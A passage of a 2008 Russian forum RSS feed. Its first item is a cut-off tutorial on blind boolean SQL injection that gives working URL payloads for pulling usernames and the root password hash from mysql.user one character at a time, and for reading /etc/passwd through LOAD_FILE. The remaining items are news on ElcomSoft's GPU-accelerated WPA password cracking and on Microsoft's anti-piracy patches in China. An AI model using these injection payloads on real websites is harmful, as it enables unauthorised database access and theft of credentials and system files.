существует, то нам выдаст результат 1 в ascii 31 и он &amp;gt;1 поэтому результат будет положительный, если нет, то ничего не выдаст и результат отрицательный... Подберем столбцы предположим есть таблица mysql.user&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=1+AND+ascii(lower(substring((SELECT+user+from mysql.user+LIMIT+1),1,1)))&amp;gt;1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;если нет столбца результат отрицательный, если таковой существует, то результат положительный... &lt;br /&gt;Таким же способом можно узнать имя юзера и пароль, то есть так же как я описывал выше.&lt;br /&gt;есть ещё такой вариант перебора, но он мне не нравится...&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=11+AND+ascii(lower(substring((SELECT+password from mysql.user+WHERE+user=&amp;quot;root&amp;quot;+LIMIT+1),1,1)))&amp;gt;48&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;просто мы указывам тут лишние значеения, которые могут быть нам не известны.&lt;br /&gt;Функция LIMIT+1 отрезает нам первого юзера из таблицы, LIMIT+2 вырезает второго итд... Можно выдирать данные из information_schema а если ты панк то и&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;www.site.ru/index.php?id=1+AND+ascii(lower(substring((SELECT+LOAD_FILE(&#039;etc/passwd&#039;)+from mysql.user+LIMIT+1),1,1)))&amp;gt;1&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;если месяц потрудитесь, то может и выдерите юзеров из etc&lt;/p&gt;
						&lt;p&gt;&amp;#160; &lt;span style=&quot;color: silver&quot;&gt;(c)ImpLex - Whack.ru&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Mon, 20 Oct 2008 10:14:53 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>ElcomSoft предлагает взламывать WI-FI c помощью NVIDIA</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;Компания Elcomsoft подала заявку на патент с описанием новой технологии подбора паролей в беспроводных сетях, использующих стандарты безопасности WPA и WPA2. По заявлениям разработчиков, методика обеспечивает в десятки раз более высокую скорость подбора пароля по сравнению со стандартными средствами. &lt;/p&gt;
						&lt;p&gt;Уже несколько лет ElcomSoft выпускает программное обеспечение Distributed Password Recovery, предназначенное для подбора забытых паролей. Недавно вниманию общественности была представлена новая версия инструмента, в котором за перебор вариантов отвечает многофункциональный графический процессор от NVIDIA, а не стандартный CPU. &lt;/p&gt;
						&lt;p&gt;Проведенные испытания показали, что правильный ключ Wi-Fi подбирается в 10-15 раз быстрее при запуске решения от Elcomsoft на ноутбуке, укомплектованном видеокартой NVIDIA GeForce 8800M или 9800M. А использование того же самого ПО на настольном ПК, оснащенном двумя или несколькими картами NVIDIA GTX 280, повышает производительность приложения более чем в 100 раз. &lt;/p&gt;
						&lt;p&gt;Elcomsoft Distributed Password Recovery также может использоваться для получения доступа к Windows-системам, разблокирования защищенных паролем документов Microsoft Office и PDF и решения других задач. Компания продвигает свой продукт на рынке как рабочий инструмент для сотрудников спецслужб и госучреждений, а также коммерческих фирм, предоставляющих услуги по восстановлению паролей и данных&lt;/p&gt;
						&lt;p&gt;Между тем некоторые эксперты высказывают опасения, что инструментарий Elcomsoft Distributed Password Recovery может стать оружием в руках сетевых мошенников. Ведь теперь взлом защиты WPA/WPA2 в беспроводных сетях будет занимать не недели и месяцы, а дни и, возможно, даже часы.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: silver&quot;&gt;www.elcomsoft.ru&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Sun, 19 Oct 2008 23:53:47 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>Microsoft начинает масштабную кампанию по борьбе с пиратством в Китае</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;Китайские информационные агентства, ссылаясь на внутреннюю корреспонденцию Microsoft, сообщают о новых планах корпорации по борьбе с пиратством в стране. &lt;/p&gt;
						&lt;p&gt;По неофициальной информации, начиная с 20 октября софтверный гигант ужесточит свою политику в отношении китайских пользователей пиратских версий операционной системы Windows XP Professional и пакета офисных приложений MS Office. Предполагается, что китайское подразделение Microsoft выпустит два специальных патча, которые будут загружаться через систему автоматического обновления и выполнять несколько функций, в том числе агитационную. &lt;/p&gt;
						&lt;p&gt;Помимо сообщений о преимуществах использования лицензионного софта, пользователей пиратских изданий Windows XP, не отключивших функцию автообновления, ожидает появление черного экрана при запуске системы. Для возврата нормального отображения рабочего стола придется изменить его фон. Однако экран будет чернеть каждый час. Кроме того, при входе в Windows пользователи увидят сообщение &amp;quot;Возможно, вы стали жертвой компьютерного пиратства&amp;quot;. &lt;/p&gt;
						&lt;p&gt;Пользователи пиратских копий Microsoft Office столкнутся с проблемами в отображении панелей инструментов.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: silver&quot;&gt;security.compulenta.ru&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Sun, 19 Oct 2008 23:51:48 +0400</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=3#p3</guid>
		</item>
	</channel>
</rss>
